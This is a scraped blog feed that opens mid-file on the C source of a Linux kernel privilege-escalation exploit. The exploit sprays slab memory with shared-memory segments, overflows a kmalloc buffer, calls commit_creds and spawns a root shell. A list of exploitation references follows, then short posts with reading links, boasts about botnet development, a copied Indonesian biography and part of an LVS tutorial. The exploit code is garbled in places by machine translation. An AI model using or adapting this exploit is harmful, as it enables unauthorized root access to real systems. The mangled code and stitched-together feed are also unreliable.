fp)! = NULL) {<br />sscanf (buff, "% s% u% u", name, & active_num, & total_num);<br />if (! strcmp (slab_name, name)) {<br />* Active = active_num;<br />* Total = total_num;<br />return total_num - active_num;<br />}<br />}<br /><br />return -1;<br />}<br /><br />void clear_old_shm (void)<br />{<br />char * cmd = "for shmid in` cat / proc / sysvipc / shm | awk '{print $ 2}' `;"<br />"Do ipcrm-m $ shmid> / dev / null 2> &1; done;";<br /><br />system (cmd);<br />}<br /><br />void mmap_init (void)<br />{<br />a void * the payload;<br /><br /> the payload = mmap ((void *) (0x41414141 & 0xfff are), 2 * 4096<br /> PROT_READ | PROT_WRITE | PROT_EXEC,<br /> MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);<br /> if ((long) the payload == -1) {<br /> printf ("[*] Failed to the mmap () at the target address. \ n");<br /> return;<br /> }<br />printf ("[+] mmaping kernel code at 0x41414141 ok. \ n");<br /> memcpy ((void *) 0x41414141, & kernel_code, 1024);<br /><br />}<br /><br />void setup (void)<br />{<br />printf ("[+] looking for symbols ... \ n");<br /><br />commit_creds = (_commit_creds)<br />find_symbol_by_proc (KALLSYMS_NAME, "commit_creds");<br /> if (! commit_creds) {<br />printf ("[-] not found commit_creds addr. \ n");<br />return;<br /> }<br /><br />prepare_kernel_cred =<br />(_prepare_kernel_cred) Find_symbol_by_proc (KALLSYMS_NAME,<br />"Prepare_kernel_cred");<br /> if (! prepare_kernel_cred) {<br />printf ("[-] not found prepare_kernel_cred addr. \ n");<br />return;<br /> }<br /><br />printf ("[+] setting up the exploit the payload ... \ n");<br /><br />super_block.s_flags = 0;<br /><br /> inode.i_size = 4096;<br /> inode.i_sb = & super_block;<br /> inode.inotify_watches.next = & inode.inotify_watches;<br /> inode.inotify_watches.prev = & inode.inotify_watches;<br /> inode.inotify_mutex.count = 1;<br /><br /> dentry.d_count = 4096;<br /> dentry.d_flags = 4096;<br /> dentry.d_parent = NULL;<br /> dentry.d_inode = &inode;<br /><br /> op.mmap = & kernel_code;<br /> op.get_unmapped_area = & kernel_code;<br /><br /> vfsmount.mnt_flags = 0;<br /> vfsmount.mnt_count =;<br /><br /> file.fu_list.prev = & file.fu_list;<br /> file.fu_list.next = & file.fu_list;<br /> file.f_dentry = &dentry;<br /> file.f_vfsmnt = &vfsmount;<br /> file.f_op = &op;<br /><br /> shmid_kernel.shm_perm.key = IPC_PRIVATE;<br /> shmid_kernel.shm_perm.uid = 501;<br /> shmid_kernel.shm_perm.gid = 501;<br /> shmid_kernel.shm_perm.cuid = getuid ();<br /> shmid_kernel.shm_perm.cgid = getgid ();<br /> shmid_kernel.shm_perm.mode = -1;<br /> shmid_kernel.shm_file = &file;<br />}<br /><br />int trigger (void)<br />{<br />int * shmids;<br />int total_num, active_num, free_num;<br />int base, free_idx, i;<br />int ret;<br />char buff [1024];<br /><br />clear_old_shm ();<br /><br />free_num = check_slab (SLAB_NAME, & active_num, & total_num);<br />fprintf (stdout, "[+] checking the slab total:% d of the active:% d free in:% d \ n",<br />total_num, active_num, total_num - active_num);<br /><br />shmids = malloc (sizeof (int) * (free_num + SLAB_NUM * 3));<br /><br />fprintf (stdout, "[+] smashing free in the slab ... \ n");<br />for (i = 0; i < free_num + SLAB_NUM; i++) {<br /> if (!check_slab(SLAB_NAME, &active_num, &total_num))<br /> break;<br /><br /> shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);<br /> if (shmids[i] < 0) {<br /> perror("shmget");<br /> return -1;<br /> }<br /> }<br /> base = i;<br /> fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n",<br /> i, total_num, active_num, total_num - active_num);<br /><br /> fprintf(stdout, "[+] smashing adjacent slab ...\n");<br /> i = base;<br /> for (; i < base + SLAB_NUM; i++) {<br /> shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);<br /> if (shmids[i] < 0) {<br /> perror("shmget");<br /> return -1;<br /> }<br /> }<br /> check_slab(SLAB_NAME, &active_num, &total_num);<br /> fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n",<br /> i, total_num, active_num, total_num - active_num);<br /><br /> //free_idx = base + SLAB_NUM - 4;<br /> free_idx = i - 4;<br /> fprintf(stdout, "[+] free exist shmid with idx: %d\n", free_idx);<br /> if (shmctl(shmids[free_idx], IPC_RMID, NULL) == -1) {<br /> perror("shmctl");<br /> }<br /><br /> sleep(1);<br /><br /> fprintf(stdout, "[+] trigger kmalloc overflow in %s\n", SLAB_NAME);<br /> memset(buff, 0x41, sizeof(buff));<br /> shmid_kernel.shm_perm.seq = shmids[free_idx + 1] / IPCMNI;<br /> memcpy(&buff[SLAB_SIZE + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));<br /> //memcpy(&buff[SLAB_SIZE], &shmid_kernel, sizeof(shmid_kernel));<br /><br /> printf("[+] shmid_kernel size: %d\n", sizeof(shmid_kernel));<br /> printf("[+] kern_ipc_perm size: %d\n", sizeof(struct kern_ipc_perm));<br /> printf("[+] shmid: %d\n", shmids[free_idx]);<br /><br /> kmalloc_overflow_test(buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof(shmid_kernel));<br /><br /> ret = (int)shmat(shmids[free_idx + 1], NULL, SHM_RDONLY);<br /> if (ret == -1 && errno != EIDRM) {<br /> setresuid(0, 0, 0);<br /> setresgid(0, 0, 0);<br /><br /> printf("[+] launching root shell!\n");<br /><br /> execl("/bin/bash", "/bin/bash", NULL);<br /> exit(0);<br /> }<br /><br /> return 0;<br />}<br /><br />int main(void)<br />{<br /> mmap_init();<br /> setup();<br /> trigger();<br />}<br /><br />å...ãEUR�å�,èEUR?<br /><br />1ãEUR� Jon Oberheide - Linux Kernel CAN SLUB Overflow<br />2ãEUR� grip2 - Linux å+...æ ¸æº¢å?ºç "究系å^--(2) - kmalloc 溢å?ºæ?EURæoe¯<br />3ãEUR� qobaiashi - the sotry of exploiting kmalloc() overflows<br />4ãEUR� Ramon de Carvalho Valle - Linux Slab Allocator Bu_er Overow Vulnerabilities<br />5ãEUR� wzt - How to Exploit Linux Kernel NULL Pointer Dereference<br />6ãEUR� wzt - Linux kernel stack and heap exploitation<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-2660613932031049088?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-80817548940061197992012-02-08T12:23:00.000-08:002012-02-08T12:25:01.015-08:00some good reading materials for real 1337<a href="http://www.cloud-sec.org/">http://www.cloud-sec.org/</a><br /><a href="http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory">http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory</a><br /><a href="http://articles.manugarg.com/systemcallinlinux2_6.html">http://articles.manugarg.com/systemcallinlinux2_6.html</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8081754894006119799?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-24837381726953417752012-02-06T09:37:00.000-08:002012-02-06T09:37:32.116-08:00ok after a pretty long time finally i got chance to continue again<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-wr3cOC_J0zU/TzAPiplAAMI/AAAAAAAAA4o/YK5tNqp6gh8/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-wr3cOC_J0zU/TzAPiplAAMI/AAAAAAAAA4o/YK5tNqp6gh8/s1600/botnet.jpg" width="800"/></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-2483738172695341775?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-61853239190722967362012-02-04T20:56:00.005-08:002012-02-04T20:56:47.634-08:00prepare urself cocroach<h6 class="uiStreamMessage" data-ft="{"type":1}"><span class="messageBody" data-ft="{"type":3}">i just remember when i was young i'm good at mathematic, prepare ur self cocroach , i'll recall it back and gain more power<br /><a href="http://web.archive.org/web/20030813073451/http://www.solhack.ath.cx/aboutus.html" rel="nofollow nofollow" target="_blank"><span>http://web.archive.org/web/</span><wbr></wbr><span class="word_break"></span><span>20030813073451/http://</span><wbr></wbr><span class="word_break"></span>www.solhack.ath.cx/aboutus.html</a></span></h6><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6185323919072296736?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-4145365488479312222012-02-01T14:48:00.001-08:002012-02-01T14:48:28.032-08:00neighbour<a href="http://tomoyo.sourceforge.jp/cgi-bin/lxr/source/net/core/neighbour.c">http://tomoyo.sourceforge.jp/cgi-bin/lxr/source/net/core/neighbour.c</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-414536548847931222?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-82679436871511918832012-02-01T14:22:00.001-08:002012-02-01T14:25:05.452-08:00Some kprobes articles<a href="http://www.mjmwired.net/kernel/Documentation/kprobes.txt">http://www.mjmwired.net/kernel/Documentation/kprobes.txt</a><br /><br /><a href="http://www.ibm.com/developerworks/library/l-kprobes/index.html">http://www.ibm.com/developerworks/library/l-kprobes/index.html</a><br /><br /><a href="http://lwn.net/Articles/132196/">http://lwn.net/Articles/132196/</a><br /><br /><a href="http://www.blogger.com/goog_2047745819"> </a><br /><a href="http://www.redhat.com/magazine/005mar05/features/kprobes/">http://www.redhat.com/magazine/005mar05/features/kprobes/</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8267943687151191883?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-77774875722113513682012-02-01T13:36:00.001-08:002012-02-01T13:48:21.940-08:00burn the creativity to create some codes that never existsso sue me all 1337 hates copycaters, they copycat other's code and call themself 1337 meanwhile i create all codes and ideas from my brain only and they calle me kids, what da fvckin retarded, fvckin shit at least i know IDT shitz<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-0iQ8V91FfxQ/TymwVB2QEqI/AAAAAAAAA4g/3ME4jR11tww/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-0iQ8V91FfxQ/TymwVB2QEqI/AAAAAAAAA4g/3ME4jR11tww/s1600/botnet.jpg" width="620" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-7777487572211351368?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-19229227903636643202012-02-01T12:28:00.000-08:002012-02-01T12:28:30.117-08:002012 botnet development continuei got so dizzy when i see there so many files already, so i rearrange them into folders just like my gopher, i'll never resign until i create a master piece<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-C0ZqxZLz8MQ/TymgMccvEaI/AAAAAAAAA4Y/jUoKrC_I-Ko/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-C0ZqxZLz8MQ/TymgMccvEaI/AAAAAAAAA4Y/jUoKrC_I-Ko/s1600/botnet.jpg" width="620" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-1922922790363664320?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-39034380715690600622012-01-31T03:40:00.001-08:002012-01-31T03:40:30.329-08:00Tommy Winata - my idol<img src="http://upload.wikimedia.org/wikipedia/id/a/a9/Tomy_Winata.jpg" /><br /><b>Tommy Winata</b> (lahir dengan nama <b>Oe Suat Hong</b> di <a class="mw-redirect" href="http://id.wikipedia.org/wiki/Pontianak" title="Pontianak">Pontianak</a>, <a href="http://id.wikipedia.org/wiki/Kalimantan_Barat" title="Kalimantan Barat">Kalimantan Barat</a>, <a href="http://id.wikipedia.org/wiki/23_Juli" title="23 Juli">23 Juli</a> <a href="http://id.wikipedia.org/wiki/1958" title="1958">1958</a>; umur 53 tahun), atau sering dikenal dengan inisial <b>TW</b>, adalah seorang pengusaha <a href="http://id.wikipedia.org/wiki/Indonesia" title="Indonesia">Indonesia</a> keturunan <a href="http://id.wikipedia.org/wiki/Tionghoa" title="Tionghoa">Tionghoa</a> yang merupakan pemilik <a class="new" href="http://id.wikipedia.org/w/index.php?title=Grup_Artha_Graha&action=edit&redlink=1" title="Grup Artha Graha (halaman belum tersedia)">Grup Artha Graha</a>. Usahanya terutama bergerak dalam bidang perbankan, tekstil dan konstruksi. Ia seringkali didesas desuskan mempunyai kaitan dengan bisnis hitam dan ilegal.<br />Grup Artha Graha miliknya didirikan dengan dukungan dari <a class="mw-redirect" href="http://id.wikipedia.org/wiki/TNI" title="TNI">TNI</a> (dahulu ABRI), melalui beberapa kawan dekatnya seperti <a class="mw-redirect" href="http://id.wikipedia.org/wiki/Eddy_Sudradjat" title="Eddy Sudradjat">Eddy Sudradjat</a> (dahulu KSAD, sekarang Ketua Umum partai <a class="mw-redirect" href="http://id.wikipedia.org/wiki/PKPI" title="PKPI">PKPI</a>).Ia termasuk "taipan" yang ditakuti karena di belakangnya konon berdiri tokoh-tokoh militer. Suginato Kusuma atau lebih dikenal sebagai Aguan juga adalah mitra Tomy dalam Grup Artha Graha.<br />Melalui Bank Artha Graha, Tomy menyelesaikan proyek SCBD termasuk gedung bursa saham Jakarta. Selain itu Tomy mempunyai andil dalam pembangungan Bukit Golf Mediterania, Kelapa Gading Square, The City Resorts, Mangga Dua Square, Pacific Place, Discovery Mall Bali, Borobudur Hotel, The Capital Residence, Apartemen Kusuma Candra, Ancol Mansion, The Mansion at Kemang, Mall Artha Gading, Senayan Golf Residence.<br />Taipan muda ini konon menyuruh karyawannya merusak gedung majalah dan koran <a href="http://id.wikipedia.org/wiki/Tempo" title="Tempo">Tempo</a> karena dituduh membakar <a href="http://id.wikipedia.org/wiki/Pasar_Tanah_Abang" title="Pasar Tanah Abang">pasar Tanah Abang</a> pada awal <a href="http://id.wikipedia.org/wiki/2003" title="2003">2003</a>. Lalu ia memenangkan proses di pengadilan dan mendapatkan uang sebesar <a href="http://id.wikipedia.org/wiki/Rupiah" title="Rupiah">Rp.</a> 500 <a class="mw-redirect" href="http://id.wikipedia.org/wiki/Juta" title="Juta">juta</a>.<br />Menangnya Tommy Winata dalam sidang ini, membuat para wartawan di <a href="http://id.wikipedia.org/wiki/Indonesia" title="Indonesia">Indonesia</a> menjadi ketakutan dalam meliput berita.<br />Sekarang ini Tomy sedang merintis perkembangan bibit unggul padi yang diharapkan dapat meningkatkan produksi padi nasional Indonesia. Melalui PT Sumber Alam Sutera, Tomy bekerja sama dengan Guo Hao Seed Industries Co. Ltd. dari China untuk bersama2 mengembangkan bibit hybrid yang dapat meningkatkan produksi padi menjadi 5-8 ton/hektar.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-3903438071569060062?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-44320110439007991232012-01-28T22:39:00.001-08:002012-01-28T22:41:27.632-08:00LVS Knowledge<div style="position: absolute;"></div><br /><h1 align="CENTER">source <a href="http://www.ultramonkey.org/papers/lvs_tutorial/html/">http://www.ultramonkey.org/papers/lvs_tutorial/html/ </a></h1><h1 align="CENTER">Linux Virtual Server Tutorial </h1><div class="author_info"><div align="CENTER"><b>Horms (Simon Horman) - <tt>horms@valinux.co.jp</tt></b>&